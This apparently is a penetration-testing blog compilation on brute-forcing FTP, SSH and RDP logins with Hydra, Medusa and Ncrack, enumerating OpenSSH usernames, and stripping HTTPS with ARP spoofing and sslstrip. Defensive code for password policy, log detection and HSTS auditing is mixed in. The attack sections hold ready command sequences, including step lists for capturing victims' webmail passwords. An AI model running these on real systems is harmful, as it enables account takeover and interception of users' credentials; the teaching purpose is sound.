Wednesday, 30 March 2016

Attacking sql servers

MEDUSA

Medusa is an alternative to Hydra and is a really fast password cracking tool. It is a parallel brute force tool just like Hydra; however, it is more stable and faster than Hydra because it uses pthreads, so it does not have to duplicate data between its workers, whereas Hydra uses fork() for parallel processing. To know more about why Medusa is better, you can refer to its official documentation, the link to which is given below.

BASIC SYNTAX

To check the available options in Medusa, we execute the “medusa” command without parameters. As its help output shows, we need four parameters in order to run Medusa.
-h = Hostname to attack
-u = Username to attack
-P = Password file
-M = Service (module) to attack

OPENSSH USERNAME DISCOVERY BUG

In the following example, we will use Medusa to crack an SSH password, but before that, we will use an OpenSSH username discovery bug to find a valid username. OpenSSH is one of the most widely used pieces of software for providing encrypted communication over a network. To perform a more efficient brute force attack, a penetration tester needs to know which usernames exist. With SSH, there is a small trick that was recently brought to attention by a security researcher at “cureblog.de”.
The problem with OpenSSH is that it checks whether the user exists before it validates the password. Supplying a very long password makes that check slow, which introduces a noticeable delay. In short: with a very long password, the response is delayed when the username exists and comes back quickly when it does not. A security researcher, Tyler Borland, has written a Python script to automate this process.
The script is available at
https://code.google.com/p/multiproc-openssh-username-bruteforce/source/browse/ssh_user_enum.py
Note: the bug does not always work, and at the time of writing it is not known under exactly which conditions it does.

USAGE

The usage is extremely simple. Here is the basic syntax, which checks whether the username root exists or not.
root@root:# ./ssh_user_enum.py -user root -Host <IP>

CRACKING SSH WITH MEDUSA

In our previous example of password cracking, we used Hydra to crack FTP passwords. In this example, we will use Medusa to crack SSH accounts. We will issue the following command to get the job done:
medusa -h 192.168.75.141 -u root -P password.txt -M ssh
After a few attempts, it managed to find the correct password, which was “rafay”. Now you can log in to the SSH server using your favorite SSH client, such as PuTTY.
Note: Medusa found the correct password only because it was in the wordlist, where we had placed it for this demonstration.
Documentation:

NCRACK

Ncrack is one of my favorite tools for password cracking. It is built on the nmap libraries and comes preinstalled with BackTrack. It can be combined with nmap to yield great results. The only disadvantage I see with this tool is that it supports very few services, namely FTP, SSH, Telnet, POP3, SMB, RDP, and VNC.

BASIC SYNTAX

We can execute the “ncrack” command without parameters in the terminal to find out what parameters are required for using ncrack.
-u = Username to attack
-P = Password file
-p = Port of the service to attack (lowercase p)
-f = Quit cracking after the first credential is found

CRACKING AN RDP WITH NCRACK

It’s funny how I always see the question “How do I crack an RDP?” on multiple hacking/security forums, as the process is quite simple. RDP stands for remote desktop protocol, which is generally used for remote management purposes.
As I have already demonstrated how to crack ftp and ssh with hydra and medusa, we will learn to crack an RDP account with ncrack. But before that, let’s take a look at an interesting case study.

CASE STUDY OF A MORTO WORM

In August 2010, F-Secure published an interesting story about a worm named “Morto,” which spread dangerously fast across networks around the world. The worm took advantage of people using weak or default passwords for their RDP log-ins, such as administrator, password, and 123456. When Morto found an RDP service, it tried a list of default passwords. Once it logged in, it started scanning the local area network for MS-Term-Service listening on port 3389, and it used the same password list to connect to those hosts in turn. In this way, it spread very fast.
Now that you have been made aware of how leaving an RDP with default passwords can be dangerous for an organization, let us try cracking it with Ncrack.
Command:
ncrack -v -u administrator -P /pentest/passwords/wordlists/darkc0de.lst rdp://192.168.75.140
The -v is an additional parameter I specified here, which turns on verbose output, followed by the -u parameter for the username, -P for the password file, and finally rdp:// followed by the IP address of the target. Once the credentials are cracked, we can use rdesktop to log in to the RDP server.
Command:
rdesktop -u administrator -p aedis 192.168.75.140

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

As mentioned before, ncrack can be combined with nmap for more effective results. We have already learnt to write nmap’s results to an XML file with the -oX option in the scanning post. If you are not familiar with it, go back and review the scanning post.
In this particular example, we will scan our local network, 192.168.75.1/24, for all live hosts with open ports and then feed the results to ncrack, which will automatically attempt to crack every service that requires authentication.
Now, from ncrack, we will execute the following command to brute-force all the network services requiring authentication.
Note: This will not work for ms-term-service due to a bug in the tool. Therefore, for rdp, you need to try it separately by using the method I explained earlier.
Command:
ncrack -vv -u administrator -P /pentest/passwords/wordlists/darkc0de.lst -iX /root/Desktop/output.xml -f
ncrack will now start cracking the services that have authentication, leaving out the others. So now you’ve seen how easy it is to combine nmap and ncrack to automate our process.

Sunday, 27 March 2016

Advance Exploiting tools


Thursday, 24 March 2016

Attacking network remotely

ATTACKING NETWORK REMOTE SERVICES

In previous chapters, we have learned to enumerate open ports and the corresponding services running upon those ports, as well as assessing the vulnerabilities of the services by various methods. Now it’s time to exploit those vulnerabilities.
In this section, we will learn to use various tools such as Hydra, Medusa, and Ncrack to crack usernames and passwords for network services such as FTP, SSH, and RDP. Network services that support authentication are often left with default or weak passwords, which can easily be guessed or cracked via a brute force or dictionary attack. Most penetration testers don’t pay much attention to brute force attacks, but in my opinion they are the fastest way to gain access to a remote system if used intelligently.
However, the downsides of these attacks are that they can disrupt the service or cause a denial of service, and they are easily detected by intrusion detection/prevention devices. Therefore, the prevailing opinion in the community is that brute force attacks should rarely be attempted. My opinion is that although they generate a lot of noise and may be ineffective when the passwords are complex, if they are carried out efficiently they can be very useful and may allow easy penetration of the remote system.
Apart from brute force attacks, we will also discuss various other ways to exploit some network services such as FTP, SMTP, and SQL Server.

OVERVIEW OF BRUTE FORCE ATTACKS

Brute force attack is a process of guessing a password through various techniques. Commonly, brute force attacks are divided into three categories:

TRADITIONAL BRUTE FORCE

In a traditional brute force attack, you try all possible combinations to guess the correct password. This process is usually very time consuming; if the password is long, it will take years to brute-force, but if the password is short, it can give quick results. Though there are alternative methods to reduce the time taken to brute-force a password, this type of attack should still be avoided in a normal penetration test.

DICTIONARY ATTACKS

In a dictionary-based brute force attack, we use a custom wordlist containing the candidate usernames and passwords to try. It is much faster than a traditional brute force attack and is the recommended approach for penetration tests. The only downside is that if the password is not in the list, the attack won’t succeed. We have already discussed some tools that can be used to gather password lists from the victim’s website in the “Information Gathering Techniques” post, so what we learned there will start to make sense now.

HYBRID ATTACKS

Hybrid brute force attacks are a combination of both traditional brute force attack and dictionary-based attack. The idea behind a hybrid attack is that it will apply a brute force attack on the dictionary list. An example of this type of attack is the following:
A university has set up a password policy where the password is their “first name” followed by their date of birth. For example, my first name is “Rafay” and my date of birth is February 5, 1993; therefore, my password would be “Rafay521993.” In this case, neither traditional brute force nor dictionary attack would be effective, but the hybrid attack would be.
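The hybrid pattern described above is exactly the shape a password policy should reject. The following is an added example (not the post’s code) of such a check, built around the post’s own “Rafay” / 5 February 1993 case; the function names and the 12-character minimum are my own choices.

```python
import re
from datetime import date


def dob_digit_variants(dob_iso):
    """Digit strings a user might glue to a name from a date of birth (ISO
    "YYYY-MM-DD"): padded and unpadded day/month, 2- and 4-digit year, in the
    common field orders. The post's example, 5 Feb 1993 -> "521993", is
    unpadded day + unpadded month + 4-digit year."""
    dob = date.fromisoformat(dob_iso)
    days = {str(dob.day), f"{dob.day:02d}"}
    months = {str(dob.month), f"{dob.month:02d}"}
    years = {str(dob.year), f"{dob.year % 100:02d}"}
    variants = set(years)                      # a bare year is common too
    for d in days:
        for m in months:
            for y in years:
                variants.update({d + m + y, m + d + y, y + m + d, y + d + m})
    return variants


def is_name_plus_dob(password, first_name, dob_iso):
    """True if the password is (case-insensitively, ignoring common separators)
    the user's first name joined to a rendering of their date of birth, in
    either order. A hybrid attack tries this shape first, so a policy should
    reject it even when length and character-class rules are satisfied."""
    pw = re.sub(r"[\s._@-]", "", password.lower())
    name = first_name.lower()
    if name not in pw:
        return False
    return any(pw == name + d or pw == d + name for d in dob_digit_variants(dob_iso))


def check_password_policy(password, first_name, dob_iso, min_len=12):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if first_name.lower() in password.lower():
        problems.append("contains the user's first name")
    if is_name_plus_dob(password, first_name, dob_iso):
        problems.append("first name combined with date of birth (hybrid-attack pattern)")
    return problems


if __name__ == "__main__":
    # The post's example password, checked against the post's example user.
    print(check_password_policy("Rafay521993", "Rafay", "1993-02-05"))
```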

COMMON TARGET PROTOCOLS

Though there are lots of protocols that we can target, we will commonly come across only the following network protocols/services:
FTP
SSH
SMB
SMTP
HTTP
RDP
VNC
MySQL
MS SQL
Generally, if you are trying to crack any one of these services, the methodology will be the same. All you would need to do is change a few parameters within the tools.

TOOLS OF THE TRADE

There are several tools that could be used for cracking network remote services, and each of them has its own pros and cons depending upon what protocols you are targeting. Let’s take a look at them one by one.

THC HYDRA

THC Hydra is one of the oldest password cracking tools, developed by “The Hackers Community.” To my knowledge, Hydra has by far the widest protocol coverage of any password cracking tool, and it is available for almost all modern operating systems. I use Hydra most of the time in my penetration tests. The only thing I do not use it for is brute-forcing HTTP authentication, because there are better tools for that, which we will discuss in the “Web Hacking” post.

BASIC SYNTAX FOR HYDRA

Hydra comes preloaded with a username/password list. We can predefine a single username or a username list; the choice is ours. Alternatively, we can use our own custom password list to increase the chances of success. The first choice would be to use a list of the top 100 or 1000 worst passwords.
A collection of good password lists can be found at packetstorm (http://packetstormsecurity.com/Crackers/wordlists/). Here is the basic syntax for hydra to brute-force a service.

EXAMPLE WITH USERNAME SET TO “ADMINISTRATOR”

hydra -l administrator -P password.txt <target ip> <service>

EXAMPLE WITH USERNAME SET TO USERNAME LIST

hydra -L users.txt -P password.txt <target ip> <service>
Note: We need to define the location of the username/password list file for hydra to work.

CRACKING SERVICES WITH HYDRA

Let’s start by cracking an ftp password with hydra, which is one of the most commonly found services. For that, we need an ftp service to be running on the target. Consider the target machine having an IP address of 192.168.75.40.
By performing a simple port scan with nmap, we find that the target machine is running an FTP server on port 21.
Looking at the other services, such as ms-term-serv and NetBIOS, we can conclude that the FTP server is running on the Windows operating system, which has the username “administrator” by default (we can also verify this by performing OS detection with nmap). So we can specify the username as “administrator” in hydra, which saves us some time, but it is recommended that you use a wordlist.
Now, in order to use hydra to brute-force the FTP password, we need to issue the following command:
hydra -l administrator -P /pentest/passwords/wordlist/darkcode.lst 192.168.75.140 ftp
The command is very simple. We have specified the username as “administrator” followed by the –P parameter and the location where the wordlist is located. In BackTrack, the default list is located in the /pentest/passwords/wordlist/ directory.
Notice that hydra has managed to find the password: “aedis”. While this brute force attack was running, heavy traffic was observed on the server end, and in the FTP logs we could see hydra in action, leaving a large trail of failed attempts.
These brute force attacks are not recommended for that reason. Now that we know the username and the password for the FTP server, we can try logging in. Type “ftp” followed by the server name; it will ask for a username and password. After entering them, we will be logged in to the FTP server, where we can issue further commands.
In a similar manner, we can use Hydra to brute-force other services such as SSH, SMB, and RDP. The method for cracking a web form is a bit different; however, there are much better tools for it than Hydra, which we will discuss when we reach the “Web Hacking” post.
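The post notes the trail Hydra left in the FTP logs, and the same is true of Medusa and Ncrack against SSH and RDP. As an added defender-side example (not the post’s code), here is a sliding-window detector over constructed vsftpd-style and sshd-style log lines that flags a client bursting login failures against one service and marks the alert if that client then logs in successfully; the log lines, the 5-in-60-seconds threshold and the hostname “srv” are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not from the post): vsftpd-style FTP lines followed
# by sshd auth-log lines. One client bursts failures and then succeeds.
SAMPLE_LOG = """\
Thu Mar 24 10:00:01 2016 [pid 4011] [administrator] FAIL LOGIN: Client "192.168.75.1"
Thu Mar 24 10:00:01 2016 [pid 4012] [administrator] FAIL LOGIN: Client "192.168.75.1"
Thu Mar 24 10:00:02 2016 [pid 4013] [administrator] FAIL LOGIN: Client "192.168.75.1"
Thu Mar 24 10:00:02 2016 [pid 4014] [administrator] FAIL LOGIN: Client "192.168.75.1"
Thu Mar 24 10:00:03 2016 [pid 4015] [administrator] FAIL LOGIN: Client "192.168.75.1"
Thu Mar 24 10:00:03 2016 [pid 4016] [administrator] OK LOGIN: Client "192.168.75.1"
Thu Mar 24 10:05:00 2016 [pid 4020] [bob] FAIL LOGIN: Client "192.168.75.22"
Mar 24 10:10:00 srv sshd[5001]: Failed password for root from 192.168.75.1 port 51000 ssh2
Mar 24 10:10:00 srv sshd[5002]: Failed password for root from 192.168.75.1 port 51001 ssh2
Mar 24 10:10:01 srv sshd[5003]: Failed password for invalid user test from 192.168.75.1 port 51002 ssh2
Mar 24 10:10:01 srv sshd[5004]: Failed password for root from 192.168.75.1 port 51003 ssh2
Mar 24 10:10:02 srv sshd[5005]: Failed password for root from 192.168.75.1 port 51004 ssh2
Mar 24 10:10:02 srv sshd[5006]: Accepted password for root from 192.168.75.1 port 51005 ssh2
Mar 24 10:20:00 srv sshd[5010]: Failed password for alice from 192.168.75.30 port 40000 ssh2
"""

VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[\d.]+)"')
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<res>Failed|Accepted) '
    r'password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)')


def parse_line(line, year=2016):
    """Normalise one log line to (timestamp, service, client_ip, user, success)."""
    m = VSFTPD_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        return ts, "ftp", m["ip"], m["user"], m["res"] == "OK"
    m = SSHD_RE.match(line)
    if m:
        # syslog timestamps carry no year; the caller supplies it
        ts = datetime.strptime(f"{m['ts']} {year}", "%b %d %H:%M:%S %Y")
        return ts, "ssh", m["ip"], m["user"], m["res"] == "Accepted"
    return None


def detect_bruteforce(lines, threshold=5, window_s=60, year=2016):
    """Sliding-window detector: alert when one client racks up `threshold`
    failed logins against one service within `window_s` seconds, and flag the
    alert if that client then logs in successfully (a likely cracked account)."""
    failures = defaultdict(deque)        # (service, ip) -> recent failure times
    alerts = {}                          # (service, ip) -> alert dict
    for line in lines:
        rec = parse_line(line, year)
        if rec is None:
            continue
        ts, service, ip, user, ok = rec
        key = (service, ip)
        if ok:
            if key in alerts:
                alerts[key]["success_after"] = True
                alerts[key]["cracked_user"] = user
            continue
        q = failures[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {"service": service, "ip": ip, "failures": len(q),
                           "since": q[0], "success_after": False, "cracked_user": None}
        elif key in alerts:
            alerts[key]["failures"] += 1
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```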

HYDRA GUI

For all GUI fans, there is a GUI version of Hydra, which is available by default in BackTrack. All you need to do is to type “Xhydra” or “HydraGTK” from the command line to explore it.

Monday, 21 March 2016

Introduction to remote exploitation

Finally, we’ve come to the exploitation part. We can now use the knowledge acquired so far to gain access to the target machine. Exploitation can be both server side and client side. Server side exploitation involves direct contact with the server and does not require any user interaction. Client side exploitation, on the other hand, is where you engage the target’s user (the client) in order to exploit it.
Server side exploitation will be the focus of this post. The main goal of this chapter is to familiarize the audience with the methodologies that can be used to hack into a target. The following topics will be covered:
1. Understanding the network protocols
2. Attacking network remote services
3. Introduction to Metasploit
4. Reconnaissance with Metasploit
5. Exploiting the local/remote target with Metasploit
6. Introduction to Armitage
7. Exploiting local/remote target with Metasploit

UNDERSTANDING NETWORK PROTOCOLS

Having a solid introduction about network protocols is fundamental in the server exploitation phase; you just cannot attack a protocol without knowing how it works. I will not be explaining the ins and outs of every protocol because there are good resources available where you can learn about them, so I don’t need to reinvent the wheel. However, in this post, I will give a brief introduction to network protocols.
As a penetration tester, most of the time you will come across only three protocols:
1. TCP (Transmission Control Protocol)
2. UDP (User Datagram Protocol)
3. ICMP (Internet Control Messaging Protocol)

TRANSMISSION CONTROL PROTOCOL

Most of the Internet’s traffic is based upon TCP since it guarantees a reliable communication unlike UDP. Most of the protocols that we encounter in our daily lives are based upon TCP. Common examples are FTP, SMTP, Telnet, and HTTP.
TCP is used whenever we need reliable communication between a client and a server. TCP establishes a reliable connection via the three-way handshake.

USER DATAGRAM PROTOCOL

UDP is the exact opposite of TCP. It is used for faster communication; an example is video streaming or Skype (VoIP) calls. The advantage of this protocol over TCP is that it is much faster and more efficient. The disadvantage of UDP is that it does not guarantee that a packet will reach its destination, since it does not perform the three-way handshake, thus causing reliability issues. Some of the common UDP protocols that we will run into as penetration testers are DNS and SQL Server.

INTERNET CONTROL MESSAGING PROTOCOL

ICMP runs at layer 3 (the network layer) of the OSI model, unlike TCP and UDP, which run at layer 4. The protocol was developed for reporting errors and troubleshooting on a network. It is a connectionless protocol, which means that it gives no guarantee that a packet will reach its destination. Common applications that use ICMP are “ping” and “traceroute.” I have discussed both of them in great detail in the “Information Gathering Techniques” post.

SERVER PROTOCOLS

In this module, we will be attacking server protocols, but as mentioned earlier, first we need to understand how they work. All server protocols are divided into two basic categories:
1. Text-based protocols
2. Binary protocols

TEXT-BASED PROTOCOLS (IMPORTANT)

Text-based protocols are human readable protocols, and this is where you, as a penetration tester, need to spend most of your time as they are very easy to understand. Common examples of text-based protocols are HTTP, FTP, and SMTP.

BINARY PROTOCOLS

Binary protocols are not human readable and are very difficult to understand; they are designed for efficiency across the wire. As penetration testers, our primary focus will be on text/ASCII-based protocols, not binary protocols.
So let’s talk about some of the popular text-based protocols such as FTP, HTTP, and SMTP.

FTP

FTP stands for File Transfer Protocol; it runs on port 21. FTP is commonly used for uploading and downloading files to and from a server. FTP, in my opinion, is the weakest link in a network because it is unencrypted, meaning that anybody on the local network can use a network sniffer to capture all of the communication. A Wireshark capture taken while I was logging in to an FTP server, with the username set to “username” and the password to “password”, shows clearly that both are sent unencrypted, in plain text.
Also, some FTP servers allow anonymous log-ins and are often not updated or patched, making it easier for an attacker to compromise them.

SMTP

SMTP stands for Simple Mail Transfer Protocol. It runs on port 25 and is used by most mail servers today. As a penetration tester, we will encounter SMTP a lot, as it is almost always exposed on the Internet and often carries sensitive information.

HTTP

You open up your browser, type a URL into the address bar, and connect to the website. The protocol you are using to do this is HTTP. It runs on port 80 and is the foundation of the web.

FURTHER READING

We will not go into the specifics of protocols in this book as it does not deal with that subject. But as a penetration tester, you will sometimes run into a protocol that you haven’t seen before. The best way to learn is by reading the RFC (Request for Comments) of each protocol, which is its official documentation and contains the ins and outs of the protocol. I won’t ask you to memorize all the commands because it’s not necessary; what is necessary is to know where to get information when needed. The RFCs are something you want to spend some time on every day. In the following, I recommend some sources that you should spend some time on before proceeding with this discussion.

RESOURCES

Saturday, 19 March 2016

SSL strip

SSL STRIP: STRIPPING HTTPS TRAFFIC

So far, we have only discussed capturing the insecure http traffic, but not secure connections like https. For this, a tool called SSL strip really comes in handy. This tool is helpful even for websites that switch between https and http. The way it works is it replaces all the https links with http links and remembers the change.
It also strips any secure cookie flag it sees in the cookie headers it relays. Secure cookies instruct the browser to only transmit them over https, so by stripping the flag we are also able to capture cookies. In order for the page to look legitimate, it also replaces the favicon with a padlock icon so that the victim thinks he is on a secure connection.
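As an added defensive check (example code, not part of the original post or of the sslstrip tool), the following audits an HTTP response head for the two properties this downgrade exploits: cookies without the Secure attribute, and a missing or zero-lifetime Strict-Transport-Security header (a browser that has already seen a valid HSTS header refuses plain http to that host, which is what defeats the rewritten links). Both response heads are constructed.

```python
import re

# Constructed response heads (not captured from any real site). The first is
# what a downgrade attack feeds on; the second is how the same site should answer.
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sid=3f9a1c; Path=/; HttpOnly
Set-Cookie: prefs=dark; Path=/
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: sid=3f9a1c; Path=/; Secure; HttpOnly
Set-Cookie: prefs=dark; Path=/; Secure
"""


def parse_headers(raw):
    """Return (name_lower, value) pairs from a response head, keeping repeated
    headers such as Set-Cookie in order. The status line is skipped."""
    headers = []
    for line in raw.splitlines()[1:]:
        if not line.strip():
            break                        # blank line ends the head
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_downgrade_exposure(raw):
    """List what an HTTPS-to-HTTP downgrade could exploit in this response:
    cookies without the Secure attribute (the browser would send them on the
    stripped http:// connection) and a missing or zero max-age HSTS header."""
    headers = parse_headers(raw)
    findings = []
    hsts = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts:
        findings.append("no Strict-Transport-Security header")
    else:
        m = re.search(r"max-age=(\d+)", hsts[0])
        if m is None or int(m.group(1)) == 0:
            findings.append("Strict-Transport-Security has no positive max-age")
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie = value.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie!r} lacks Secure")
    return findings


if __name__ == "__main__":
    print("weak:", audit_downgrade_exposure(WEAK_RESPONSE))
    print("hardened:", audit_downgrade_exposure(HARDENED_RESPONSE))
```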

REQUIREMENTS

In order to run SSL Strip, we should have already implemented the ARP spoofing attack. You can do it with any of the tools we discussed earlier. Also make sure that port forwarding is enabled before performing the ARP spoofing attack.

USAGE

SSL strip can be found in the /pentest/web/ssltrip directory. Navigate to that directory and execute the following command to get it running.
root@bt:/pentest/web/ssltrip# ./sslstrip.py -l 8080
The -l parameter instructs SSL strip to listen on port 8080.
Whenever the victim logs in to an account, say Facebook, the connection will be forced over http. Hence, we can easily use our favorite packet-capturing tool to capture all the traffic. Alternatively, we can view the captured traffic in the sslstrip.log file, which is written to the same directory that SSL strip is located in. Just use your favorite text editor to open the log file.

HTTPS HACKING USING SSL STRIP (COMMANDS)

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log


2ND METHOD, BACKTRACK (SNIFF HTTPS PASSWORDS USING SSL STRIP)

ifconfig wlan0 down
macchanger --mac 00:22:33:44:55:66 wlan0
ifconfig wlan0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
leafpad /etc/etter.conf (remove the # sign in front of redir_command_off in the 2 lines)
ettercap -Tqi wlan0 -M arp:remote // // (it shows how many hosts were added)
iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -a -k -f (let's see the victim side)
Open Gmail, Yahoo, or Facebook on the victim computer; after logging in, check the attacker PC, where the id and password are shown in the sslstrip terminal.